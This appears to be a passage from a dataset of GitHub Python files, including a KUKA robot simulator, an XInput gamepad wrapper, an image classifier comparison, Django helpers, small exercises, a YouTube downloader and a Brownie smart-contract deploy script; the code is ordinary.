self.kuka_robot_urdf.fkine(self.kuka_robot_urdf.q).rpy(order='zyx')\n\n self.tool_position_t = np.around(self.tool_position_t, decimals=3)\n self.tool_position_r = np.around(self.tool_position_r, decimals=3)\n\n # update joint velocity\n # TODO\n\n # update joint acceleration\n # TODO\n\n # publish robot joint states\n self.pub_JointPosition.publish(self.list_to_string(self.JointPosition))\n self.pub_ToolPosition.publish(self.list_to_string(np.hstack((self.tool_position_t, self.tool_position_r))))\n # self.pub_ToolForce.publish(self.list_to_string(self.ToolForce))\n # self.pub_ToolTorque.publish(self.list_to_string(self.ToolTorque))\n # self.pub_JointAcceleration.publish(self.list_to_string(self.JointAcceleration))\n # self.pub_JointVelocity.publish(self.list_to_string(self.JointVelocity))\n # self.pub_JointJerk.publish(self.list_to_string(self.JointJerk))\n\n # publish robot boolean states\n self.pub_isCompliance.publish(str(self.isCompliance))\n self.pub_isCollision.publish(str(self.isCollision))\n self.pub_isReadyToMove.publish(str(self.isReadyToMove))\n self.pub_isMastered.publish(str(self.isMastered))\n self.pub_OperationMode.publish(str(self.OperationMode))\n self.pub_isFinished.publish(str(self.isFinished))\n self.pub_hasError.publish(str(self.hasError))\n self.pub_OperatorAck.publish(str(self.OperatorAck))\n return\n\n# Simulate ros topics\nkuka_ros = KukaSimulatedROS()\n\n# Launch the simulator Swift\nenv = swift.Swift()\nenv.launch(browser='firefox') \n\n# Add the robot to the simulator\nenv.add(kuka_ros.kuka_robot_urdf)\n\n# This is our callback funciton from the sliders in Swift which set\n# the joint angles of our robot to the value of the sliders\ndef set_joint(j, value):\n # print(f\"aaaa{j}\")\n kuka_ros.kuka_robot_urdf.q[j] = np.deg2rad(float(value))\n\ndef add_slider():\n # Loop through each link in the Kuka and if it is a variable joint,\n # add a slider to Swift to control it\n j = 0\n for link in kuka_ros.kuka_robot_urdf.links:\n if link.isjoint:\n\n # We use a lambda as the callback function from Swift\n # j=j is used to set the value of j rather than the variable j\n # We use the HTML unicode format for the degree sign in the unit arg\n env.add(\n swift.Slider(\n lambda x, j=j: set_joint(j, x),\n min=np.round(np.rad2deg(link.qlim[0]), 2),\n max=np.round(np.rad2deg(link.qlim[1]), 2),\n step=1,\n value=np.round(np.rad2deg(kuka_ros.kuka_robot_urdf.q[j]), 2),\n desc=\"Joint \" + str(j),\n unit=\"°\",\n )\n )\n j += 1\n\n# move robot to the desird joint position with a joint motion planning\n# w in degrees/s\ndef move(des_position, w = 20):\n # trajectory steps and time to move\n steps = 500\n t_move = np.linalg.norm(np.deg2rad(np.array(des_position, dtype=np.float32)) - kuka_ros.kuka_robot_urdf.q)/np.deg2rad(w)\n dt = t_move/(steps)\n\n # joint motion planning\n q_traj = rtb.jtraj(kuka_ros.kuka_robot_urdf.q, np.deg2rad(np.array(des_position, dtype=np.float32)), steps)\n\n # move the simulated robot\n for q in q_traj.q:\n kuka_ros.kuka_robot_urdf.q = q\n env.step(0)\n time.sleep(dt) \n\n# Add the sliders to Swift\nadd_slider()\n\nq = np.array([0,0,0,0,0,0,0])\nwhile True:\n # Process the event queue from Swift, this invokes the callback functions\n # from the sliders if the slider value was changed\n # env.process_events()\n \n if kuka_ros.move_flag:\n # update flags for busy state\n # kuka_ros.isReadyToMove = False\n kuka_ros.isFinished = False\n\n # move robot on simulation\n move(kuka_ros.DesPosition)\n # move([100,50,50,20,4,56,0])\n\n # update flags for ready state\n kuka_ros.move_flag = False\n # kuka_ros.isReadyToMove = True\n kuka_ros.isFinished = True\n\n # Update the environment with the new robot pose\n env.step(0.05)\n\n # time.sleep(0.05)\n","repo_name":"guisoares9/iiwa_practices","sub_path":"src/iiwa_simulation_node.py","file_name":"iiwa_simulation_node.py","file_ext":"py","file_size_in_byte":8093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"22817947894","text":"# Enumeration Based Microsoft XInput - Gamepad API\n\nfrom ._ctypes import *\n\nfrom typing import *\nfrom enum import Enum\nfrom time import time as time_now\n\n__all__ = ['XInputGamepad', 'GamePadState', 'AnalogStick', 'ButtonFlags', 'AnalogInputs']\n\nEventKeys = Union[AnalogInputs, ButtonFlags]\n\n\n# Immutable data classes\n# State of an analog stick\nclass AnalogStick(NamedTuple):\n x: float\n y: float\n raw_x: int\n raw_y: int\n dead_zone: float\n magnitude: float\n\n\n# Input state of XGamePad\nclass GamePadState(NamedTuple):\n analog_l: AnalogStick\n analog_r: AnalogStick\n trigger_l: float\n trigger_r: float\n buttons: Dict[ButtonFlags, bool]\n events: Dict[EventKeys, Any]\n\n\n# Singleton-like gamepad class\n# Enumeration approach to the Singleton Pattern\ndef update_gamepads():\n for g in XInputGamepad:\n if g.disabled:\n pass\n elif g.connected() or time_now() - g.last_update > 5:\n # update connected devices or try to reconnect after 5 secs\n g.fetch_input()\n\n\n# Updates all xinput devices and checks connections\ndef create_neutral_state(dz) -> GamePadState:\n neutral_as = create_analog_stick(0, 0, dz)\n return GamePadState(analog_l=neutral_as, analog_r=neutral_as,\n trigger_l=.0, trigger_r=.0, events={},\n buttons={b: False for b in ButtonFlags})\n\n\n# Instantiation helper for a neutral gamepad state\ndef create_analog_stick(raw_x: int, raw_y: int, dead_zone: float) -> AnalogStick:\n axis_x = raw_x / C_SHORT\n axis_y = raw_y / C_SHORT\n magnitude = (axis_x ** 2 + axis_y ** 2) ** 0.5\n if magnitude > dead_zone:\n dz_factor = (magnitude - dead_zone) / (1 - dead_zone)\n return AnalogStick(x=axis_x / magnitude * dz_factor,\n y=axis_y / magnitude * dz_factor,\n raw_x=raw_x,\n raw_y=raw_y,\n dead_zone=dead_zone,\n magnitude=magnitude)\n else:\n return AnalogStick(x=.0,\n y=.0,\n raw_x=raw_x,\n raw_y=raw_y,\n dead_zone=dead_zone,\n magnitude=.0)\n\n\n# Instantiation helper for analog sticks\nclass XInputGamepad(Enum):\n pad_0 = 0\n pad_1 = 1\n pad_2 = 2\n pad_3 = 3\n\n def __init__(self, value):\n # hardware info\n self._raw_id = value\n self._raw_state = XINPUTSTATE()\n\n # status\n self.enabled = True\n self._connected = False\n self.last_update = time_now()\n\n # settings\n self.dz = 0.3\n\n # state\n self.input_state = create_neutral_state(self.dz)\n self.rumble_l = 0\n self.rumble_r = 0\n\n def connected(self) -> bool:\n return self._connected\n\n def __repr__(self) -> str:\n return \"XGamePad: {}\".format(self._raw_id)\n\n def __str__(self) -> str:\n tmp = \"connected\" if self._connected else \"not connected\"\n return \"XGamePad:{} ({})\".format(self._raw_id, tmp)\n\n def set_rumble(self, rumble_l: float, rumble_r: float) -> None:\n self.rumble_l = rumble_l\n self.rumble_r = rumble_r\n vibration = XINPUTVIBRATION(int(rumble_l * U_SHORT), int(rumble_r * U_SHORT))\n XInputSetState(self._raw_id, ctypes.byref(vibration))\n\n def fetch_input(self) -> None:\n self.last_update = time_now()\n success = self._try_fetch_raw()\n if success:\n # analog input\n events = dict()\n game_pad = self._raw_state.Gamepad\n # analog_l\n analog_l = self._read_analog(self.input_state.analog_l,\n game_pad.sThumbLX,\n game_pad.sThumbLY,\n events)\n # analog_r\n analog_r = self._read_analog(self.input_state.analog_r,\n game_pad.sThumbRX,\n game_pad.sThumbRY,\n events)\n # trigger_l\n trigger_l = self._read_trigger(self.input_state.trigger_l,\n game_pad.bLeftTrigger,\n events)\n # trigger_r\n trigger_r = self._read_trigger(self.input_state.trigger_r,\n game_pad.bRightTrigger,\n events)\n # digital input\n buttons = dict()\n for btn_code in ButtonFlags:\n self._read_button(btn_code, events, buttons)\n\n # create new official state\n self.input_state = GamePadState(analog_l=analog_l,\n analog_r=analog_r,\n trigger_l=trigger_l,\n trigger_r=trigger_r,\n buttons=buttons,\n events=events)\n\n def _try_fetch_raw(self) -> bool:\n error_code = XInputGetState(self._raw_id, self._raw_state)\n if error_code == ERROR_NOT_CONNECTED:\n if self._connected:\n # connection lost\n # update connection status\n self._connected = False\n # reset input fields\n self.input_state = self._neutral_state()\n # disconnected!\n print(self)\n return False\n else:\n if not self._connected:\n # connection established\n # update connection status\n self._connected = True\n # deactivate vibration\n self.set_rumble(rumble_l=.0, rumble_r=.0)\n # reconnected!\n print(self)\n return True\n\n def _read_analog(self, old_value, raw_x, raw_y, events):\n new_value = create_analog_stick(raw_x, raw_y, self.dz)\n dx = new_value.x - old_value.x\n dy = new_value.y - old_value.y\n if abs(dx) > 0 or abs(dy) > 0:\n events[AnalogInputs.analog_l] = (dx, dy)\n return new_value\n\n # noinspection PyMethodMayBeStatic\n def _read_trigger(self, old_value, raw_value, events):\n new_value = raw_value / U_BYTE\n delta = new_value - old_value\n if abs(delta) > 0:\n events[AnalogInputs.trigger_r] = delta\n return new_value\n\n def _read_button(self, btn_code, events, buttons):\n new_value = (self._raw_state.Gamepad.wButtons & btn_code.value) is not 0\n old_value = self.input_state.buttons[btn_code]\n if not (new_value == old_value):\n events[btn_code] = new_value\n buttons[btn_code] = new_value\n return new_value\n","repo_name":"Korangar/PyPlatformer2018_ProjectRain","sub_path":"api/xinput/xinput_game_pad.py","file_name":"xinput_game_pad.py","file_ext":"py","file_size_in_byte":6900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72608332964","text":"import image_augmentation\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nfrom sklearn.model_selection import GridSearchCV, train_test_split\nfrom sklearn import svm\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom xgboost import XGBClassifier\nimport random\nimport skimage as sk\nimport skimage.io as skio\nimport os\nimport numpy as np\nimport time\n\ndef main():\n data = []\n \n nmc = 'C:\\\\Users\\\\gabri\\\\Desktop\\\\NMC Pathology\\\\nmc'\n non_nmc = 'C:\\\\Users\\\\gabri\\\\Desktop\\\\NMC Pathology\\\\non-nmc'\n\n nmc_images = [os.path.join(nmc, f) for f in os.listdir(nmc) if os.path.isfile(os.path.join(nmc, f))]\n non_nmc_images = [os.path.join(non_nmc, f) for f in os.listdir(non_nmc) if os.path.isfile(os.path.join(non_nmc, f))]\n \n nmc_labels = [1 for _ in range(len(nmc_images))]\n non_nmc_labels = [0 for _ in range(len(non_nmc_images))]\n \n targets = nmc_labels + non_nmc_labels\n \n nmc_imgs = []\n non_nmc_imgs = []\n \n for pic in nmc_images:\n img = skio.imread(pic)\n img = sk.transform.resize(img, (150, 150), anti_aliasing=True)\n #img = sk.color.rgb2gray(img)\n nmc_imgs.append(img.flatten())\n \n for pic in non_nmc_images:\n img = skio.imread(pic)\n img = sk.transform.resize(img, (150, 150), anti_aliasing=True)\n #img = sk.color.rgb2gray(img)\n non_nmc_imgs.append(img.flatten())\n \n data = nmc_imgs + non_nmc_imgs\n data = np.asarray(data)\n targets = np.asarray(targets)\n \n x_train, x_test, y_train, y_test = train_test_split(data, targets, test_size=0.3, random_state=0)\n \n svc = svm.SVC(random_state=0)\n xgb = XGBClassifier(random_state=0)\n dtc = DecisionTreeClassifier(random_state=0)\n nbc = GaussianNB()\n rfc = RandomForestClassifier(random_state=0)\n gbc = GradientBoostingClassifier(random_state=0)\n mlp = MLPClassifier(random_state=0)\n \n models = {\"SVC\": svc, \"XGBoost\": xgb, \"DecisionTree\": dtc, \"NaiveBayes\": nbc, \"RandomForest\": rfc, \"GradientBoost\": gbc, \"NeuralNet\": mlp}\n params = {}\n \n for name, model in models.items():\n if model == svc:\n params = {'C': [1, 10, 100, 1000], 'gamma': [0.01, 0.001, 0.0001], 'kernel': ['rbf', 'linear']}\n elif model == xgb:\n params = {}\n elif model == dtc:\n params = {'max_depth': [1, 2, 3, 4]}\n elif model == nbc:\n params = {}\n elif model == mlp:\n params = {'hidden_layer_sizes': [[128, 64, 32], [32, 32, 32]], 'activation': ['tanh', 'relu'], 'solver': ['sgd', 'adam'], 'alpha': [0.0001, 0.001, 0.01, 0.1], 'max_iter': [200, 300, 400]}\n elif model == rfc:\n params = {'n_estimators': [5, 10, 16, 32, 64, 128]}\n elif model == gbc:\n params = {'n_estimators': [5, 10, 16, 32, 64, 128]}\n \n start_time = time.time()\n \n clf = GridSearchCV(model, params, cv=5)\n clf.fit(x_train, y_train)\n pred = clf.predict(x_test)\n confusion = confusion_matrix(y_test, pred)\n \n duration = time.time() - start_time\n \n print(\"\\n\\n--- {} ---\".format(name))\n print(\"Total Duration: {}\".format(duration))\n print(\"Score: {}\".format(clf.score(x_test, y_test)))\n print(\"Confusion Matrix:\")\n print(\"{}\".format(confusion))\n \nif __name__ == '__main__':\n main()\n","repo_name":"Gabriel0110/NUT-Carcinoma-Pathology-Classification","sub_path":"NMC_Classifier.py","file_name":"NMC_Classifier.py","file_ext":"py","file_size_in_byte":3582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38974736095","text":"import os\nfrom django.contrib.gis.utils import LayerMapping\nfrom .models import Roads\n\nroads_mapping = {\n\t'osm_id' : 'osm_id',\n\t'name' : 'name',\n\t'ref' : 'ref',\n\t'type' : 'type',\n\t'oneway' : 'oneway',\n\t'bridge' : 'bridge',\n\t'maxspeed' : 'maxspeed',\n\t'geom' : 'MULTILINESTRING',\n}\n\n\n\n\naccidents_shp = os.path.abspath(os.path.join(os.path.dirname(__file__), '../mapgis/data/Roads.shp'))\n\ndef run(verbose=True):\n lm = LayerMapping(Roads, accidents_shp ,roads_mapping, transform=False, encoding='iso-8859-1')\n\n lm.save(strict=True, verbose=verbose)","repo_name":"Thom03/nairobicameras","sub_path":"mapgis/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21672306308","text":"import math\n\ndef floatInput(prompt, min = None, max = None):\n while True:\n try:\n res = float(input(prompt))\n break\n except ValueError:\n print(\"ERROR: Not a float\")\n while True: \n try:\n assert min < max\n if min < res < max:\n return res\n else:\n print(\"ERROR: Value should be in [-273.15, inf]!\")\n break\n except TypeError:\n return res\n\n \n\n\ndef main():\n print(\"a) Try entering invalid values such as 1/2 or 3,1416.\")\n v = floatInput(\"Value? \")\n print(\"v:\", v)\n\n print(\"b) Try entering invalid values such as 15%, 110 or -1.\")\n h = floatInput(\"Humidity (%)? \", 0, 100)\n print(\"h:\", h)\n\n print(\"c) Try entering invalid values such as 23C or -274.\")\n t = floatInput(\"Temperature (Celsius)? \", min=-273.15)\n print(\"t:\", t)\n\n # d) What happens if you uncomment this?\n impossible = floatInput(\"Value in [3, 0]? \", min=3, max=0)\n\n return\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"P-Ramos16/Univ","sub_path":"2021-2022/Sem1/FP/Aula06/floatinput.py","file_name":"floatinput.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"36606172355","text":"import yt_dlp\r\n\r\n'''\r\nRu: Вводим через терминал ссылку на видео\r\nEng: Enter the video link through the terminal\r\n'''\r\nurl = input('Enter the link for the video: ') \r\n\r\ndef download(url):\r\n '''\r\n Ru: Опции для скачивания. По умолчанию стоит формат скачки 'mp4', его можно поменять, но советую оставить этот формат\r\n Eng: Options for downloading. The default download format is 'mp4', you can change it, but I advise you to keep this format\r\n '''\r\n ydl_opts = {\r\n 'format': 'mp4'\r\n }\r\n\r\n '''\r\n Ru: Открываем контектстный менеджер и начинаем скачивание нашего видео\r\n Eng: Open the content manager and start downloading our video.\r\n '''\r\n with yt_dlp.YoutubeDL(ydl_opts) as ydl:\r\n ydl.download([url])\r\n\r\n'''\r\nRu: Вызов функции скачивания видео\r\nEng: Calling the video download function\r\n'''\r\ndownload(url)","repo_name":"VolinNilov/Useful-tools-from-Volin","sub_path":"YouTube Downloader/youtube_download.py","file_name":"youtube_download.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70059861604","text":"'''\r\nWrite a program that computes the net amount of a bank account based a transaction\r\n log from console input. The transaction log format is shown as following:\r\nD 100\r\nW 200\r\n\r\nD means deposit while W means withdrawal.\r\nSuppose the following input is supplied to the program:\r\nD 300\r\nD 300\r\nW 200\r\nD 100\r\nThen, the output should be:\r\n500\r\n'''\r\ntotal = 0\r\nwhile True:\r\n s = input()\r\n if not s:\r\n break\r\n values = s.split(\" \")\r\n operation = values[0]\r\n count = int(values[1])\r\n if operation == \"D\":\r\n total += count\r\n elif operation == \"W\":\r\n total -= count\r\nprint(\"total is %d\" %total)","repo_name":"Z-P-J/PythonProgrammingEveryday","sub_path":"src/day25/day25.py","file_name":"day25.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39082220515","text":"from django import forms\nfrom django.utils.translation import gettext_lazy as _\n\nfrom .base import QuestionTypeBase\n\n\nclass ChoicesBase(QuestionTypeBase):\n class Meta:\n abstract = True\n\n class OptionsForm(forms.Form):\n empty_label = forms.CharField(required=False)\n # choices = EditChoicesField()\n\n def clean_question_options(self, question_options):\n \"\"\"\n expected question_options format:\n {\n choices: [\n {value: \"\", label: \"\"}, ...\n ]\n }\n \"\"\"\n if \"choices\" not in question_options:\n raise forms.ValidationError('key \"choices\" required')\n if not isinstance(question_options.get(\"choices\"), list):\n raise forms.ValidationError('list in \"choices\" required')\n if len(question_options.get(\"choices\")) < 1:\n raise forms.ValidationError('list of \"choices\" is empty')\n for choice in question_options.get(\"choices\"):\n if \"label\" not in choice:\n raise forms.ValidationError('key \"label\" in choice is required')\n if \"value\" not in choice:\n raise forms.ValidationError('key \"value\" in choice is required')\n\n # Clean whitespace and set 'value' to 'label' if it is empty.\n value = choice[\"value\"].strip()\n label = choice[\"label\"].strip()\n choice[\"value\"] = value if value else label\n choice[\"label\"] = label\n\n return question_options\n\n\nclass Choices(ChoicesBase):\n class Meta:\n name = \"choices\"\n verbose_name = _(\"Choices\")\n widget_class = forms.Select\n\n def formfield(self, result_set):\n choices = [(c.get(\"value\"), c.get(\"label\")) for c in self.question.question_options.get(\"choices\")]\n\n if self.question.question_options.get(\"empty_label\"):\n choices = [(\"\", self.question.question_options.get(\"empty_label\"))] + choices\n\n return forms.ChoiceField(\n widget=self.formfield_widget(),\n label=self.question.question_text,\n required=self.question.required,\n choices=choices,\n # validators=[validators.validate_slug],\n )\n\n\nclass ChoicesMultiple(ChoicesBase):\n class Meta:\n name = \"choices_multiple\"\n verbose_name = _(\"Choices multiple\")\n multiple = True\n widget_class = forms.CheckboxSelectMultiple\n\n def formfield(self, result_set):\n choices = [(c.get(\"value\"), c.get(\"label\")) for c in self.question.question_options.get(\"choices\")]\n\n if self.question.question_options.get(\"empty_label\"):\n choices = [(\"\", self.question.question_options.get(\"empty_label\"))] + choices\n\n return forms.MultipleChoiceField(\n widget=self.formfield_widget(),\n label=self.question.question_text,\n required=self.question.required,\n choices=choices,\n # validators=[validators.validate_slug],\n )\n","repo_name":"anfema/django-questionnaire-core","sub_path":"questionnaire_core/question_types/choices.py","file_name":"choices.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70507165605","text":"import numpy as np\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport pandas as pd\n\n\nnegations = ['never','not', 'no', 'didn', \"didn't\", 'didnt', 'didn t','doesn t', 'doesnt', \"doesn't\", \"won't\", 'won t', 'wont', \"isn't\",\"isnt\",\"isn t\", \"aren't\", 'aren t', 'arent', 'don t', \"don't\", 'dont',\"haven't\",\"haven t\",\"havent\",'weren t', \"weren't\", 'werent', \"wasn't\", 'wasn t', 'wasnt', 'wouldn t', \"wouldn't\", 'wouldnt', \"can't\", 'can t', 'couldn t',\"couldn't\", 'cant', 'cannot', 'couldnt', 'shouldnt', \"shouldn't\", 'shouldn t', 'neither', 'impossible', 'didn', 'wasn', 'weren', 'aren', 'don', 'doesn', 'couldn', 'shouldn', 'wouldn', 'won','nothing']\n\nintensity_modifiers= ['absolutely:B_INCR:0.9', 'almost:B_DECR:0.2', 'always:B_INCR:0.9', 'amazingly:B_INCR:0.8', 'awfully:B_INCR:0.8',\n 'completely:B_INCR:0.9', 'considerable:B_INCR:0.6', 'considerably:B_INCR:0.6', 'decidedly:B_INCR:0.6', 'deeply:B_INCR:0.9',\n 'effing:B_INCR:0.7', 'enormous:B_INCR:0.8', 'enormously:B_INCR:0.8', 'entirely:B_INCR:0.9', 'especially:B_INCR:0.8', 'exceptional:B_INCR:0.8',\n 'exceptionally:B_INCR:0.8', 'extreme:B_INCR:0.9', 'extremely:B_INCR:0.9', 'fabulously:B_INCR:0.8', 'flippin:B_INCR:0.6', 'flipping:B_INCR:0.6',\n 'frackin:B_INCR:0.6', 'fracking:B_INCR:0.6', 'frickin:B_INCR:0.7', 'fricking:B_INCR:0.7', 'friggin:B_INCR:0.7', 'frigging:B_INCR:0.7', 'fully:B_INCR:0.9',\n 'greatly:B_INCR:0.8', 'hella:B_INCR:0.8','bloody:B_INCR:0.8', 'highly:B_INCR:0.9', 'hugely:B_INCR:0.9', 'incredible:B_INCR:0.9', 'incredibly:B_INCR:0.9', 'intensely:B_INCR:0.9',\n 'just enough:B_DECR:0.4', 'kind of:B_DECR:0.3', 'kinda:B_DECR:0.3', 'kindof:B_DECR:0.3', 'kind-of:B_DECR:0.3', 'less:B_DECR:0.3', 'little:B_DECR:0.3', 'major:B_INCR:0.6',\n 'majorly:B_INCR:0.6', 'marginal:B_DECR:0.3', 'marginally:B_DECR:0.3', 'more:B_INCR:0.6', 'most:B_INCR:0.8', 'not much:B_DECR:0.2', 'occasional:B_DECR:0.6',\n 'occasionally:B_DECR:0.6', 'particularly:B_INCR:0.7', 'partly:B_DECR:0.3','partially:B_DECR:0.5', 'purely:B_INCR:0.9', 'quite:B_INCR:0.6', 'really:B_INCR:0.8', 'remarkably:B_INCR:0.9',\n 'slight:B_DECR:0.3', 'slightly:B_DECR:0.6','barely:B_DECR:0.7', 'so:B_INCR:0.8', 'somewhat:B_DECR:0.4', 'soo:B_INCR:0.9', 'sort of:B_DECR:0.4', 'sorta:B_DECR:0.4', 'sortof:B_DECR:0.4',\n 'sort-of:B_DECR:0.4', 'substantially:B_INCR:0.7', 'super:B_INCR:0.8', 'thoroughly:B_INCR:0.8', 'total:B_INCR:0.8', 'totally:B_INCR:0.9', 'tremendous:B_INCR:0.8',\n 'tremendously:B_INCR:0.8', 'truly:B_INCR:0.9', 'unbelievably:B_INCR:0.9', 'unusually:B_INCR:0.7', 'utter:B_INCR:0.8', 'utterly:B_INCR:0.8', 'very:B_INCR:0.8',\n 'not very:B_DECR:0.7']\n\n\ndef map_candidate_to_theme(neighbour_dict, candidate_dict):\n # print(neighbour_dict)\n # print(len(neighbour_dict['words']))\n # print(candidate_dict)\n emo_candi_dict = {}\n neighbor_df = pd.DataFrame(neighbour_dict)\n # print(neighbor_df.head())\n\n dft = neighbor_df.groupby('labels')['words'].nunique().sort_values(ascending=False).reset_index(name='count')\n unique_emos = dft['labels'][:3]\n # print(unique_emos)\n\n for each_cd in candidate_dict:\n dis_emo_dict = {}\n for each_ue in unique_emos:\n dis_list = []\n emod = neighbor_df.loc[neighbor_df['labels'] == each_ue][:50]\n for j, e_row in emod.iterrows():\n dis_list.append(cosine_similarity([e_row['embs']], [each_cd[2]]))\n # print(np.mean(dis_list))\n dis_emo_dict[each_ue] = np.mean(dis_list)\n # print(each_cd[0])\n # print(dis_emo_dict)\n # print(max(dis_emo_dict, key=dis_emo_dict.get))\n emo_candi_dict[each_cd[0]]: max(dis_emo_dict, key=dis_emo_dict.get)\n # break\n return emo_candi_dict\n\ndef fix_score(current_score,in_dc,in_sc):\n if(in_dc=='B_INCR'):\n final_score = current_score+(current_score*in_sc)\n elif(in_dc=='B_DECR'):\n final_score = current_score-(current_score*in_sc)\n return final_score\n\ndef check_for_negations(top_candidates):\n neg = False\n for tsp in top_candidates:\n for each_p in tsp.split(' '):\n if(each_p in negations):\n # print('profiles are negated')\n neg = True\n return neg\n\n\ndef map_opposite_emotions(emo_dict):\n opposite_emotions = {\n 'Religion/creed': 'Religion/creed',\n 'Race/ethnicity': 'Race/ethnicity',\n 'Gender': 'Gender',\n 'Sexual Orientation': 'Sexual Orientation',\n 'Physical/disability': 'Physical/disability',\n }\n opposed_dict = {}\n\n for each_key in emo_dict.keys():\n opposite_emo = opposite_emotions[each_key]\n if(opposite_emo in opposed_dict):\n opposed_dict[opposite_emo] = opposed_dict[opposite_emo]+emo_dict[each_key]\n else:\n opposed_dict[opposite_emo] = emo_dict[each_key]\n\n print(opposed_dict)\n\n return opposed_dict\n\ndef resolve_modifiers_and_negations(top_windows,sentence_tokens,emo_candidates,normalized_score_dict ):\n fixed_top_windows = []\n for i, emoWord in enumerate(top_windows):\n\n end_ind_int = sentence_tokens.index(emoWord)\n start_ind_int = end_ind_int - 3\n if start_ind_int < 0:\n start_ind_int = 0\n text_chunk_int = (' ').join(sentence_tokens[start_ind_int:end_ind_int])\n text_chunk_int = text_chunk_int.strip().lower()\n fixed_top_windows.append(text_chunk_int)\n\n # check_negations and intensity modifiers only in top candidate\n if (i == 0):\n\n # check for intensifiers or inhibitors\n for im in intensity_modifiers:\n im_splits = im.split(':')\n int_w = im_splits[0]\n in_dc = im_splits[1]\n in_sc = float(im_splits[2])\n if (len(int_w.split()) == 1):\n if int_w in text_chunk_int.split():\n # print('gotcha', im)\n # print('emo', emo_candidates[emoWord])\n crnt_sc = normalized_score_dict[emo_candidates[emoWord]]\n normalized_score_dict[emo_candidates[emoWord]] = fix_score(crnt_sc, in_dc, in_sc)\n # print('fixed', normalized_score_dict)\n elif (len(int_w.split()) > 1):\n if int_w in text_chunk_int:\n # print('gotcha', im)\n # print('emo', emo_candidates[emoWord])\n # print(fix_score(0.5,in_dc,in_sc))\n crnt_sc = normalized_score_dict[emo_candidates[emoWord]]\n normalized_score_dict[emo_candidates[emoWord]] = fix_score(crnt_sc, in_dc, in_sc)\n # print('fixed', normalized_score_dict)\n\n # check nagations\n print('check negation')\n if (check_for_negations([text_chunk_int])):\n print('Emotions are negated')\n normalized_score_dict = map_opposite_emotions(normalized_score_dict)\n return [normalized_score_dict,fixed_top_windows]\n\n# map_opposite_emotions({'anger': 0.353, 'disgust': 0.688,'anticipation':0.009})","repo_name":"GihanMora/Extreme_LexiBERTa","sub_path":"Core/modifier_handling.py","file_name":"modifier_handling.py","file_ext":"py","file_size_in_byte":7053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"14557051873","text":"from brownie import FundMe\nfrom brownie import MockV3Aggregator # List of MockV3Aggregators\nfrom brownie import network # Brownie has a list of networks. Check 'brownie networks list'\nfrom brownie import accounts # This is list of 10 Ganache accounts spawned by brownie\nfrom brownie import config # This connects to our brownie-config.yaml file\nfrom web3 import Web3\n\nFORKED_LOCAL_ENVIRONMENTS = [\"mainnet-fork\", \"mainnnet-fork-dev\"]\nLOCAL_BLOCKCHAIN_ENVIRONMENTS = [\"development\", \"ganache-l\"]\n\ndef deploy_fund_me():\n account = get_account()\n\n if network.show_active() not in LOCAL_BLOCKCHAIN_ENVIRONMENTS:\n price_feed_address = config[\"networks\"][network.show_active()][\n \"eth_usd_price_feed\"\n ]\n print(\"Current network: \", network.show_active())\n else:\n print(f\"Current network: {network.show_active()}\")\n if len(MockV3Aggregator) <= 0:\n print(\"Deploying Mock...\")\n MockV3Aggregator.deploy(18, Web3.toWei(2000, \"ether\"), {\"from\":account})\n print(\"Mock deployed...\")\n\n price_feed_address = MockV3Aggregator[-1].address\n\n fund_me = FundMe.deploy(\n price_feed_address,\n {\"from\": account}, \n publish_source=config[\"networks\"][network.show_active()].get(\"verify\")\n )\n print(f'FundMe deployed at address: {fund_me.address}')\n return fund_me\n\ndef main():\n deploy_fund_me()\n\n# Check if --network is included in brownie run deploy.py\ndef get_account():\n if network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS or network.show_active() in FORKED_LOCAL_ENVIRONMENTS:\n return accounts[0]\n else:\n return accounts.add(config[\"wallets\"][\"from_key\"])\n ","repo_name":"anonm9k/solidity-smart-contract-dev","sub_path":"demos/brownie_fund_me/scripts/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31584168139","text":"from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass ExportFormat(object):\n \"\"\"\n Specifies the export format to be used for exporting snapshot.\n \"\"\"\n\n #: A constant which can be used with the name property of a ExportFormat.\n #: This constant has a value of \"JSONL\"\n NAME_JSONL = \"JSONL\"\n\n #: A constant which can be used with the name property of a ExportFormat.\n #: This constant has a value of \"JSONL_CONSOLIDATED\"\n NAME_JSONL_CONSOLIDATED = \"JSONL_CONSOLIDATED\"\n\n #: A constant which can be used with the name property of a ExportFormat.\n #: This constant has a value of \"CONLL\"\n NAME_CONLL = \"CONLL\"\n\n #: A constant which can be used with the name property of a ExportFormat.\n #: This constant has a value of \"SPACY\"\n NAME_SPACY = \"SPACY\"\n\n #: A constant which can be used with the name property of a ExportFormat.\n #: This constant has a value of \"COCO\"\n NAME_COCO = \"COCO\"\n\n #: A constant which can be used with the name property of a ExportFormat.\n #: This constant has a value of 